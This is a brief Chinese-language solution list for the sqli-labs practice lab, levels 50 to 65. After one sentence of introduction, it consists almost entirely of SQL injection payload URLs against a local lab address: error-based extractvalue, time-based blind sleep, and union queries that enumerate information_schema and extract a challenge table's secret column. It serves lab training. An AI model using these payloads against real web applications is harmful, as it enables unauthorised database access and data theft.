Less 50-65 题目类型都没有新奇的注入方式,基本上是以往类型的注入,或者是复合型注入。老黑不进行多加赘述了,多加解释,只会看低读者的智商。payload如下所示
1 Less 50 2 http://192.168.162.135/sqli-libs/Less-50/?sort=1 and extractvalue(1, concat(0x7e, database()))--+ 3 Less 51 4 http://192.168.162.135/sqli-libs/Less-51/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+ 5 Less 52 6 http://192.168.162.135/sqli-libs/Less-52/?sort=1 and (if(ascii(left(database(),1))=115, sleep(4), 0))--+ 7 Less 53 8 http://192.168.162.135/sqli-libs/Less-53/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+ 9 Less 54 10 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+ 11 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema ='challenges' and table_name='POV9ATA70T')--+ 12 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(id,0x7c,sessid,0x7c,secret_Y7BB,0x7c,tryy) from challenges.POV9ATA70T)--+ 13 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,version(),database()--+ 14 Less 55 15 http://192.168.162.135/sqli-libs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+ 16 Less 56 17 http://192.168.162.135/sqli-libs/Less-56/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+ 18 Less 57 19 http://192.168.162.135/sqli-libs/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+ 20 Less 58 21 http://192.168.162.135/sqli-libs/Less-58/?id=-1' union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+ 22 Less 59: 23 http://192.168.162.135/sqli-libs/Less-59/?id=-1 union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+ 24 Less 60: 25 http://192.168.162.135/sqli-libs/Less-60/?id=-1") union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+ 26 Less 61: 27 http://192.168.162.135/sqli-libs/Less-61/?id=-1')) union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+ 28 Less 62: 29 http://192.168.162.135/sqli-libs/Less-62/?id=1') and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+ 30 Less 63: 31 http://192.168.162.135/sqli-libs/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+ 32 Less 64: 33 http://192.168.162.135/sqli-libs/Less-64/?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+ 34 Less 65: 35 http://192.168.162.135/sqli-libs/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+